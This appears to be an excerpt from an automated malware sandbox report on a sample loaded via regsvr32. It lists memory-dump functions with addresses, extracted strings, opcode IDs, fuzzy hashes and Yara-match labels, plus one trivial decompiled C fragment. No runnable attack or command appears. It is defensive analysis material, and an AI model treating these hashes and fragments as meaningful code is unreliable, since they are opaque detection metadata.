                                                                                                  • Source File: 00000003.00000002.385096906.0000000000E01000.00000020.00001000.00020000.00000000.sdmp, Offset: 00E01000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_e01000_regsvr32.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID: +@$`.P
                                                                                                  • API String ID: 0-1189405855
                                                                                                  • Opcode ID: a70f442d9e9e175520b0b0d93d41500bfede9fc32031e6ea222cabd22b859c02
                                                                                                  • Instruction ID: 39de2ea6a026fc69778914cf9e44a5f31bb4615b8119a4e03ad8497b2faa6ad6
                                                                                                  • Opcode Fuzzy Hash: a70f442d9e9e175520b0b0d93d41500bfede9fc32031e6ea222cabd22b859c02
                                                                                                  • Instruction Fuzzy Hash: A1316FB15187848FD348DF28C45941BBBE1BB9C758F804B1DF4CAAA260D778D645CF4A
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  Function 00E03CF4 Relevance: 2.6, Strings: 2, Instructions: 57COMMON
                                                                                                  Download Yara Rule
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.385096906.0000000000E01000.00000020.00001000.00020000.00000000.sdmp, Offset: 00E01000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_e01000_regsvr32.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID: ^$R
                                                                                                  • API String ID: 0-3595634639
                                                                                                  • Opcode ID: b7e08d49ea1b5b1d89cab638ecb6b58cb02da954cd334f399a60917b828591f9
                                                                                                  • Instruction ID: 7dec6e6ff202478201587024085261afee01554c9ae7569198c8fcb843946a7e
                                                                                                  • Opcode Fuzzy Hash: b7e08d49ea1b5b1d89cab638ecb6b58cb02da954cd334f399a60917b828591f9
                                                                                                  • Instruction Fuzzy Hash: 112180B0528781AFC398DF28D49591FBBF1BB88744F806A1DF8C686390D779D505CB46
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  Function 00E02FD4 Relevance: 2.6, Strings: 2, Instructions: 56COMMON
                                                                                                  Download Yara Rule
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.385096906.0000000000E01000.00000020.00001000.00020000.00000000.sdmp, Offset: 00E01000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_e01000_regsvr32.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID: t^$w
                                                                                                  • API String ID: 0-1486493484
                                                                                                  • Opcode ID: d9d2b37262035f156a08dae9f88ea85b7583d03cc1c0d0918aa86d9476248fb5
                                                                                                  • Instruction ID: 0fcab25796e593e8dfb7fafe86ea51ff53beb953310655f2f877b1f2b437242d
                                                                                                  • Opcode Fuzzy Hash: d9d2b37262035f156a08dae9f88ea85b7583d03cc1c0d0918aa86d9476248fb5
                                                                                                  • Instruction Fuzzy Hash: B1219DB090078E8FDB48DF68D8491DE7BB0FB18308F014A59F82996290D3B89665CF85
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  Function 00E11924 Relevance: 1.7, Strings: 1, Instructions: 428COMMON
                                                                                                  Download Yara Rule
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.385096906.0000000000E01000.00000020.00001000.00020000.00000000.sdmp, Offset: 00E01000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_e01000_regsvr32.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID: #
                                                                                                  • API String ID: 0-606707520
                                                                                                  • Opcode ID: 99547394c1cfeee33f3fbc263d3122085f4524b50faca7c5dbf1af4b9be79401
                                                                                                  • Instruction ID: 83764233260160376bc5218f555d84fcd5c49e0509acde5e25885a84154386cc
                                                                                                  • Opcode Fuzzy Hash: 99547394c1cfeee33f3fbc263d3122085f4524b50faca7c5dbf1af4b9be79401
                                                                                                  • Instruction Fuzzy Hash: 17222870914709EFDB58DFA8C45A4DEBBF1FF44348F4081ADE80AAB290D7749A19CB85
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  Function 0000000180008D28 Relevance: 1.6, APIs: 1, Instructions: 149COMMONCrypto
                                                                                                  Download Yara Rule
                                                                                                  C-Code - Quality: 100%
                                                                                                  			E00000001180008D28(long long __rbx, void* __rcx, void* __rdx, long long __rsi, signed int __r8, void* __r9) {
				signed long long _t25;
				void* _t27;
				void* _t30;

				 *((long long*)(_t30 + 8)) = __rbx;
				 *(_t30 + 0x10) = _t25;
				 *((long long*)(_t30 + 0x18)) = __rsi;
				_t27 = (_t25 | 0xffffffff) + 1;
				if ( *((intOrPtr*)(__rcx + _t27)) != dil) goto 0x80008d56;
				if (_t27 + __rdx -  !__r8 <= 0) goto 0x80008d92;
				return __rdx + 0xb;
			}






                                                                                                  0x180008d28
                                                                                                  0x180008d2d
                                                                                                  0x180008d32
                                                                                                  0x180008d56
                                                                                                  0x180008d5d
                                                                                                  0x180008d70
                                                                                                  0x180008d91

                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.385398518.0000000180001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                  • Associated: 00000003.00000002.385391498.0000000180000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.385413006.0000000180016000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.385422599.0000000180021000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.385427672.0000000180023000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_180000000_regsvr32.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: 9c9a505e11390fee30cde8d58ba8d3236255a76ec469928530f6db279ba29baa
                                                                                                  • Instruction ID: 1f7af7de608e037a3e69fafdab2b7a4d19b0596ea53e23cf5e8b59c7fdfa90c1
                                                                                                  • Opcode Fuzzy Hash: 9c9a505e11390fee30cde8d58ba8d3236255a76ec469928530f6db279ba29baa
                                                                                                  • Instruction Fuzzy Hash: D151C432700B9489FBA1DB72A8447DE7BA1B7587D4F148225FE9827B99DF38C605D700
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  Function 00E11030 Relevance: 1.6, Strings: 1, Instructions: 357COMMON
                                                                                                  Download Yara Rule
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.385096906.0000000000E01000.00000020.00001000.00020000.00000000.sdmp, Offset: 00E01000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_e01000_regsvr32.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID: ef
                                                                                                  • API String ID: 0-3522424648
                                                                                                  • Opcode ID: 63cf04038136136116a979567ba4b26417661d5f843165bc7989bb71bb8234a9
                                                                                                  • Instruction ID: 34d702f7a54826ebb142bfc54a51c7274cafc2ead3a6666deeb441bb36e81001
                                                                                                  • Opcode Fuzzy Hash: 63cf04038136136116a979567ba4b26417661d5f843165bc7989bb71bb8234a9
                                                                                                  • Instruction Fuzzy Hash: 04021870A04709EFDB58DF68C08959EBBF2FB44308F00816DE84AAB364D775DA55CB85
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  Function 00E0EF14 Relevance: 1.5, Strings: 1, Instructions: 255COMMON
                                                                                                  Download Yara Rule
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.385096906.0000000000E01000.00000020.00001000.00020000.00000000.sdmp, Offset: 00E01000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_e01000_regsvr32.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID: x]!-
                                                                                                  • API String ID: 0-585868058
                                                                                                  • Opcode ID: cf2a29744dbdbd02a151a4b044d1109f6beb7998a165a5b3606498e8daacfd79
                                                                                                  • Instruction ID: d1b53f8bad76e3f0b54258a0aa0bb0548c996c0e82691290fcb6144b64381ae4
                                                                                                  • Opcode Fuzzy Hash: cf2a29744dbdbd02a151a4b044d1109f6beb7998a165a5b3606498e8daacfd79
                                                                                                  • Instruction Fuzzy Hash: D9D199B1A0060DCFDBA8CF78C54A5DD7BF1FB48308F606129E826AA2B2D7749905CF54
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  Function 00E1A8B0 Relevance: 1.4, Strings: 1, Instructions: 195COMMON
                                                                                                  Download Yara Rule
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.385096906.0000000000E01000.00000020.00001000.00020000.00000000.sdmp, Offset: 00E01000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_e01000_regsvr32.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID: }^O
                                                                                                  • API String ID: 0-3039680174
                                                                                                  • Opcode ID: 2737519d22680c9269c125336f90b0d45ca51200b7d26ea2addf6a8d31d5b6e5
                                                                                                  • Instruction ID: 5a2c455290808fb24b09691f4e6792f8e7dc3b8abdf1de58b2b9b499a8a5d520
                                                                                                  • Opcode Fuzzy Hash: 2737519d22680c9269c125336f90b0d45ca51200b7d26ea2addf6a8d31d5b6e5
                                                                                                  • Instruction Fuzzy Hash: 13A17BB2502749CFDB98DF28C69A59D3BE1FF55308F004129FC1E9A2A0D3B4E925CB49
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  Function 00E14D20 Relevance: 1.4, Strings: 1, Instructions: 142COMMON
                                                                                                  Download Yara Rule
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.385096906.0000000000E01000.00000020.00001000.00020000.00000000.sdmp, Offset: 00E01000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_e01000_regsvr32.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID: RH
                                                                                                  • API String ID: 0-2975065227
                                                                                                  • Opcode ID: da44171f9c80a2056ccb259cc2b9eac6e02ade2ac8d9ef905a94791c40a4a894
                                                                                                  • Instruction ID: cdad1d91f480f66b27fdb659e84bc1119197df58d020f9e9c8444a22e040d48e
                                                                                                  • Opcode Fuzzy Hash: da44171f9c80a2056ccb259cc2b9eac6e02ade2ac8d9ef905a94791c40a4a894
                                                                                                  • Instruction Fuzzy Hash: 1E51267111C7448FC7A8DF18D4C66AAB7E0FB84310FA0991DE8CED7251DF74A88A8B46
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  Function 00E0BE90 Relevance: 1.4, Strings: 1, Instructions: 132COMMON
                                                                                                  Download Yara Rule
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.385096906.0000000000E01000.00000020.00001000.00020000.00000000.sdmp, Offset: 00E01000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_e01000_regsvr32.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID: Y
                                                                                                  • API String ID: 0-579211002
                                                                                                  • Opcode ID: c7ef7c05ef0c3c9f2aed6826f015ad160cfcc6abce9b29eb71b79f5d508516d5
                                                                                                  • Instruction ID: d41d8029bd9415da13f6bfbf0a834e7270de84c8394c3f2629202d7ce2768f0b
                                                                                                  • Opcode Fuzzy Hash: c7ef7c05ef0c3c9f2aed6826f015ad160cfcc6abce9b29eb71b79f5d508516d5
                                                                                                  • Instruction Fuzzy Hash: C351F4716107898BDB58DF28C88A0DD3BA1FB4835CF125328FD8EA62A1D77CD845CB49
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  Function 00E0D6CC Relevance: 1.4, Strings: 1, Instructions: 125COMMON
                                                                                                  Download Yara Rule
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.385096906.0000000000E01000.00000020.00001000.00020000.00000000.sdmp, Offset: 00E01000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_e01000_regsvr32.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID: vOs
                                                                                                  • API String ID: 0-1852020951
                                                                                                  • Opcode ID: 0a3c35978ef4d06ef910e88490b5bce2e9beff051be12035b9eadbcefa2f22bf
                                                                                                  • Instruction ID: 22b723e3a98742fb13970f999e98ad2b4648d71b89372cfc4eed7df4676e7da1
                                                                                                  • Opcode Fuzzy Hash: 0a3c35978ef4d06ef910e88490b5bce2e9beff051be12035b9eadbcefa2f22bf
                                                                                                  • Instruction Fuzzy Hash: C7618DB190030E8FDB49CF68D48A5CE7FB0FB64398F204519F845A6260D7B996A8CFD5
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  Function 00E0461C Relevance: 1.4, Strings: 1, Instructions: 115COMMON
                                                                                                  Download Yara Rule
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.385096906.0000000000E01000.00000020.00001000.00020000.00000000.sdmp, Offset: 00E01000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_e01000_regsvr32.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID: *)
                                                                                                  • API String ID: 0-1811957435
                                                                                                  • Opcode ID: c39f41b8af2b9280dd7c00c4ba0ddd05394017a856c7f82ca50d576e38ac2643
                                                                                                  • Instruction ID: 078150d52184424dd17db31459f4485cad1c2882722b64f7b09285960e87cb87
                                                                                                  • Opcode Fuzzy Hash: c39f41b8af2b9280dd7c00c4ba0ddd05394017a856c7f82ca50d576e38ac2643
                                                                                                  • Instruction Fuzzy Hash: 3931937061CB888FC728DF29D09556AB7E0FB99305F504A2EE58AC73A5DB70D805CB82
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  Function 00E0F77C Relevance: 1.4, Strings: 1, Instructions: 114COMMON
                                                                                                  Download Yara Rule
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.385096906.0000000000E01000.00000020.00001000.00020000.00000000.sdmp, Offset: 00E01000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_e01000_regsvr32.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID: t
                                                                                                  • API String ID: 0-1935021737
                                                                                                  • Opcode ID: 783391770682b9c9d34a01018b97ccb4612aed757a5715f7015a6466eeb6abdd
                                                                                                  • Instruction ID: f6c2332ea375e92e06b9f1baf38f9d76ac49519429e2fd2d76d7fd3f3ab394f0
                                                                                                  • Opcode Fuzzy Hash: 783391770682b9c9d34a01018b97ccb4612aed757a5715f7015a6466eeb6abdd
                                                                                                  • Instruction Fuzzy Hash: 6C319F3021DB448FE768DF2CD48516ABBE0FB9A344F104A6DE5CAC72A6D770D845CB92
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  Function 00E2181C Relevance: 1.4, Strings: 1, Instructions: 109COMMON
                                                                                                  Download Yara Rule
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.385096906.0000000000E01000.00000020.00001000.00020000.00000000.sdmp, Offset: 00E01000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_e01000_regsvr32.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID: __
                                                                                                  • API String ID: 0-2267946753
                                                                                                  • Opcode ID: 8f9b035c25ddab069e89f1d5b32d9e06551c62a3022c943f576078da68d92037
                                                                                                  • Instruction ID: 2c54f3c3d851db41155cbd174530d31bf845b6f79ced918ab57b032fec3a7dcb
                                                                                                  • Opcode Fuzzy Hash: 8f9b035c25ddab069e89f1d5b32d9e06551c62a3022c943f576078da68d92037
                                                                                                  • Instruction Fuzzy Hash: 0D41F070608B848BE758DF29C18A41BBBF1FBC9304F500A2DF69A873A0C775D845CB42
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  Function 00E09408 Relevance: 1.4, Strings: 1, Instructions: 105COMMON
                                                                                                  Download Yara Rule
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.385096906.0000000000E01000.00000020.00001000.00020000.00000000.sdmp, Offset: 00E01000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_e01000_regsvr32.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID: GSn
                                                                                                  • API String ID: 0-1733515909
                                                                                                  • Opcode ID: 120b4183c770ef369911dc760361451600c2e99f203226371e5481c8821bf4d7
                                                                                                  • Instruction ID: 82bbc0c32179f28186132ef6e82abdd229f1f6dcc598f6c72a47a27dfe89b96e
                                                                                                  • Opcode Fuzzy Hash: 120b4183c770ef369911dc760361451600c2e99f203226371e5481c8821bf4d7
                                                                                                  • Instruction Fuzzy Hash: AB51D6B090038E8FDF48DF64C84A5DE7BB1FB58358F104A1DEC66A6290D3B89664CF84
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  Function 00E28500 Relevance: 1.4, Strings: 1, Instructions: 103COMMON
                                                                                                  Download Yara Rule
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.385096906.0000000000E01000.00000020.00001000.00020000.00000000.sdmp, Offset: 00E01000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_e01000_regsvr32.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID: 8=
                                                                                                  • API String ID: 0-237953557
                                                                                                  • Opcode ID: bb623fe5bad30cc0ccc512b27898bb82e9ca0e52d8794c79c7b053a60b518db3
                                                                                                  • Instruction ID: 440091aa21e685a2cd1a416f66003a4d9d7146c3ae9efea191104d73c3fbf966
                                                                                                  • Opcode Fuzzy Hash: bb623fe5bad30cc0ccc512b27898bb82e9ca0e52d8794c79c7b053a60b518db3
                                                                                                  • Instruction Fuzzy Hash: 3C314930248B458BDB5CDF2CD49922ABAE1FBD9300F444A2EF58AD7365DB34D845CB82
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  Function 00E120E0 Relevance: 1.3, Strings: 1, Instructions: 96COMMON
                                                                                                  Download Yara Rule
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.385096906.0000000000E01000.00000020.00001000.00020000.00000000.sdmp, Offset: 00E01000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_e01000_regsvr32.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID: K
                                                                                                  • API String ID: 0-425913083
                                                                                                  • Opcode ID: 2b1ae9da1385bdbe4b8d4d873491c8ef025a73cbd56fa24a9a5b2ec22b63fa4f
                                                                                                  • Instruction ID: b9744f830faa122e33d926d1cd684c9f58c4eebd53e4149b8ee7128ee311117b
                                                                                                  • Opcode Fuzzy Hash: 2b1ae9da1385bdbe4b8d4d873491c8ef025a73cbd56fa24a9a5b2ec22b63fa4f
                                                                                                  • Instruction Fuzzy Hash: 7441F7B180438ECFDB48CF68D8864DE7BB0FB58344F114A19F866A6250D3B8D665CF85
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  Function 00E108CC Relevance: 1.3, Strings: 1, Instructions: 94COMMON
                                                                                                  Download Yara Rule
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.385096906.0000000000E01000.00000020.00001000.00020000.00000000.sdmp, Offset: 00E01000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_e01000_regsvr32.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID: t"
                                                                                                  • API String ID: 0-2131657386
                                                                                                  • Opcode ID: a3a222a6e056c70518c09b2f7e5539db3b60aaf61629909d00af61b4973bd0e8
                                                                                                  • Instruction ID: c55ae59100a6322aaed63c996446cbe2473037fb48fb65175a7ca83762f94da7
                                                                                                  • Opcode Fuzzy Hash: a3a222a6e056c70518c09b2f7e5539db3b60aaf61629909d00af61b4973bd0e8
                                                                                                  • Instruction Fuzzy Hash: C841C87190070D8BDF48DF64C48A4DE7FB0FB483A8F65621DE81AB6290D3B89585CF99
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  Function 00E13CD4 Relevance: 1.3, Strings: 1, Instructions: 78COMMON
                                                                                                  Download Yara Rule
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.385096906.0000000000E01000.00000020.00001000.00020000.00000000.sdmp, Offset: 00E01000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_e01000_regsvr32.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID: gLv
                                                                                                  • API String ID: 0-1669999040
                                                                                                  • Opcode ID: d372408e4ccfa21733394c795309bb98bbbf8ce06b144d4f85a8e8de8872e02b
                                                                                                  • Instruction ID: 092b6deffca3b355bffda5ffade617cc78189e10090e0f8a8cf153ca2a89f312
                                                                                                  • Opcode Fuzzy Hash: d372408e4ccfa21733394c795309bb98bbbf8ce06b144d4f85a8e8de8872e02b
                                                                                                  • Instruction Fuzzy Hash: B341A2B190078E8FDF84CF64C88A4DE7BB0FB18358F104619F866A6290D3B89665CF95
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  Function 00E018DC Relevance: 1.3, Strings: 1, Instructions: 77COMMON
                                                                                                  Download Yara Rule
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.385096906.0000000000E01000.00000020.00001000.00020000.00000000.sdmp, Offset: 00E01000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_e01000_regsvr32.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID: 2|
                                                                                                  • API String ID: 0-4112153497
                                                                                                  • Opcode ID: c8d3a13c8ccf64a8a58613b82b71848b75fef30a95d8cbfed718dfac3d203234
                                                                                                  • Instruction ID: b91563c65c8b91ec1f09e45b36dfecdf79931471c94428db7a4d2612f3b8b467
                                                                                                  • Opcode Fuzzy Hash: c8d3a13c8ccf64a8a58613b82b71848b75fef30a95d8cbfed718dfac3d203234
                                                                                                  • Instruction Fuzzy Hash: DF31E2715083808FD768DF28C58A55BBBF1FBC6704F50891DE6CA8A260DB76D849CB03
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  Function 00E24E8C Relevance: 1.3, Strings: 1, Instructions: 74COMMON
                                                                                                  Download Yara Rule
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.385096906.0000000000E01000.00000020.00001000.00020000.00000000.sdmp, Offset: 00E01000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_e01000_regsvr32.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID: v)v
                                                                                                  • API String ID: 0-2248367734
                                                                                                  • Opcode ID: 2bcb51d8d69df24c6edafa72637552a2373937b3983906909be42b2c69647502
                                                                                                  • Instruction ID: fbb4d913276c301713800a5f8b94e3e4e5a6bc2592369a311f958d50d0dfcb0b
                                                                                                  • Opcode Fuzzy Hash: 2bcb51d8d69df24c6edafa72637552a2373937b3983906909be42b2c69647502
                                                                                                  • Instruction Fuzzy Hash: 2531FFB0D107189BDF88DFB8D98A4DDBBF0BB48308F50822DD816B6290D7785A45CF68
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  Function 00E1A244 Relevance: 1.3, Strings: 1, Instructions: 73COMMON
                                                                                                  Download Yara Rule
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.385096906.0000000000E01000.00000020.00001000.00020000.00000000.sdmp, Offset: 00E01000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_e01000_regsvr32.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID: b
                                                                                                  • API String ID: 0-1908338681
                                                                                                  • Opcode ID: dddb38d3eca3b718f76d068eb3649ef697cdbcc6fe538854f7f679c62e5ae1f4
                                                                                                  • Instruction ID: 17bdd88a76ea742b17f3307574b3be47e3e99a9a8e87152f7e628db9e49eb398
                                                                                                  • Opcode Fuzzy Hash: dddb38d3eca3b718f76d068eb3649ef697cdbcc6fe538854f7f679c62e5ae1f4
                                                                                                  • Instruction Fuzzy Hash: 09318BB55187808BD748DF28C08651ABBE1BBCC308F404B1DF8CAEB2A1D778D645CB4A
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  Function 00E0D33C Relevance: 1.3, Strings: 1, Instructions: 72COMMON
                                                                                                  Download Yara Rule
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.385096906.0000000000E01000.00000020.00001000.00020000.00000000.sdmp, Offset: 00E01000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_e01000_regsvr32.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID: Y
                                                                                                  • API String ID: 0-579211002
                                                                                                  • Opcode ID: ecd3080a44302933cb34d055b18508fc771149b61013eb4241d4c9c3597933d5
                                                                                                  • Instruction ID: 3905b0f92365bb91672009248d65bd91db3d35b841bf4746a7ab911bc2e22770
                                                                                                  • Opcode Fuzzy Hash: ecd3080a44302933cb34d055b18508fc771149b61013eb4241d4c9c3597933d5
                                                                                                  • Instruction Fuzzy Hash: A33199B0628781AFD78CDF28D49692EBBE1BBD9314F816A1DF9868B350D774D404CB42
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  Function 00E10E2C Relevance: 1.3, Strings: 1, Instructions: 64COMMON
                                                                                                  Download Yara Rule
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.385096906.0000000000E01000.00000020.00001000.00020000.00000000.sdmp, Offset: 00E01000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_e01000_regsvr32.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID: 0}
                                                                                                  • API String ID: 0-2955618701
                                                                                                  • Opcode ID: 3bc7749b2bfb2771dde145a478a06cddc01c68d1a6300aeac6f15df74fb2e7de
                                                                                                  • Instruction ID: 3e7e0eca6b7df2cf9e22f590a0720919f810bbceeb8c715e312b2ca61f84fb9a
                                                                                                  • Opcode Fuzzy Hash: 3bc7749b2bfb2771dde145a478a06cddc01c68d1a6300aeac6f15df74fb2e7de
                                                                                                  • Instruction Fuzzy Hash: 95319DB052C380AFD388DF28D48591BBBE1BB88354F816A1DF8869A3A0D374D414CB47
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  Function 00E098AC Relevance: 1.3, Strings: 1, Instructions: 63COMMON
                                                                                                  Download Yara Rule
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.385096906.0000000000E01000.00000020.00001000.00020000.00000000.sdmp, Offset: 00E01000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_e01000_regsvr32.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID: 6N
                                                                                                  • API String ID: 0-1503784733
                                                                                                  • Opcode ID: 4950689d9a431a30668e4ae59cbf44894261a06e5f6f244c2bb118cbde227f48
                                                                                                  • Instruction ID: f4a86dc4653c28cccd562090cb365a0bf87d83b70404bf80af20f8f7627260ee
